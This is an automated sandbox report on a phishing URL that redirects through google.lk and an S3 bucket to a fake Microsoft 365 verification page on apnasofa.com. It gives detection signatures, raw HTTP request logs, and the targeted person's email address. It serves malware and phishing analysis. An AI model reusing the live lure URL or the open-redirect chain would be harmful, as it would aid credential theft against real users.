Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==

Overview

General Information

Sample URL:https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==
Analysis ID:1565317
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML title does not match URL
URL contains potential PII (phishing indication)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 5940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2364,i,9223651156863003473,13971906786475264581,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Antivirus detection for URL or domain
Source: https://apnasofa.com/favicon.icoAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/image/logo.pngAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/style.cssAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/indexAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/script.jsAvira URL Cloud: Label: malware
Source: https://apnasofa.com/episode/index#Avira URL Cloud: Label: malware

Phishing

barindex
AI detected phishing page
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft 365' is well-known and typically associated with the domain 'microsoft.com'., The URL 'apnasofa.com' does not match the legitimate domain for Microsoft 365., The domain 'apnasofa.com' does not have any apparent connection to Microsoft or its services., The presence of a generic or unrelated domain name is a common tactic used in phishing attempts., No subdomain or URL structure indicates a legitimate association with Microsoft 365. DOM: 1.0.pages.csv
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft 365' is well-known and typically associated with the domain 'microsoft.com'., The URL 'apnasofa.com' does not match the legitimate domain for Microsoft 365., The domain 'apnasofa.com' does not have any apparent connection to Microsoft or its services., The presence of a generic or unrelated domain name is a common phishing tactic., No subdomain or URL structure indicates a legitimate association with Microsoft 365. DOM: 1.1.pages.csv
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Joe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft 365' is well-known and typically associated with the domain 'microsoft.com'., The URL 'apnasofa.com' does not match the legitimate domain for Microsoft 365., The domain 'apnasofa.com' does not have any apparent connection to Microsoft or its services., The presence of a generic or unrelated domain name is a common tactic used in phishing attempts., The email address '2yeok0@bleehk.org' does not appear to be associated with Microsoft, adding to the suspicion. DOM: 1.2.pages.csv
AI detected landing page (webpage, office document or email)
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Joe Sandbox AI: Page contains button: 'Verify' Source: '1.0.pages.csv'
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Joe Sandbox AI: Page contains button: 'Verify' Source: '1.1.pages.csv'
AI detected suspicious Javascript
Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript: Script contains heavily obfuscated code (base64 encoded) with 'secretkey' variable (+3), uses atob for decoding (+1), likely contains hidden functionality (+2), and the presence of a hardcoded 'secretkey' suggests potential data exfiltration or malicious intent (+2). The obfuscation technique combined with sensitive key handling indicates deliberate attempt to hide functionality.
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: Number of links: 0
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: Title: pleased does not match URL
Source: https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Sample URL: PII: ernie.grue@nationalmi.com&nationalmi.com&sa
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: No favicon
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: No favicon
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: No favicon
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: No <meta name="author".. found
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: No <meta name="author".. found
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: No <meta name="author".. found
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: No <meta name="copyright".. found
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: No <meta name="copyright".. found
Source: https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: unknownHTTPS traffic detected: 2.19.202.23:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.202.23:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.lk to https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.202.23
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: global trafficHTTP traffic detected: GET /url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: google.lkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /url?q=ernie.grue@nationalmi.com&nationalmi.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: www.google.lkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: www.google.lkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=eL4v72nRf-ZMiNTC9-v4vpDW4px2Sd0CWOHdY9RfG09G625Oa2CDFL6D_BjhzLwqk4bDWIH2-RyUJwO_hHgjTJ4nXyu8ym1NL2CsZyyGWp_EyjNPRu3IqHID88joK66DGbEvknlDPKld8WzghtPz52dW4qC3w_rGK3fkyeUjiHTRMJBMUqsREmzNXZLmrN3B_5aY1g
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+MLZTbWPXAT4rRz&MD=6BwShcOh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /vocabulary.html HTTP/1.1Host: i--iy.s3.us-east-1.amazonaws.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/index HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://i--iy.s3.us-east-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/style.css HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/image/logo.png HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/script.js HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://apnasofa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://apnasofa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/script.js HTTP/1.1Host: apnasofa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /episode/image/logo.png HTTP/1.1Host: apnasofa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json/8.46.123.228 HTTP/1.1Host: ipwhois.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://apnasofa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://apnasofa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /json/8.46.123.228 HTTP/1.1Host: ipwhois.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+MLZTbWPXAT4rRz&MD=6BwShcOh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
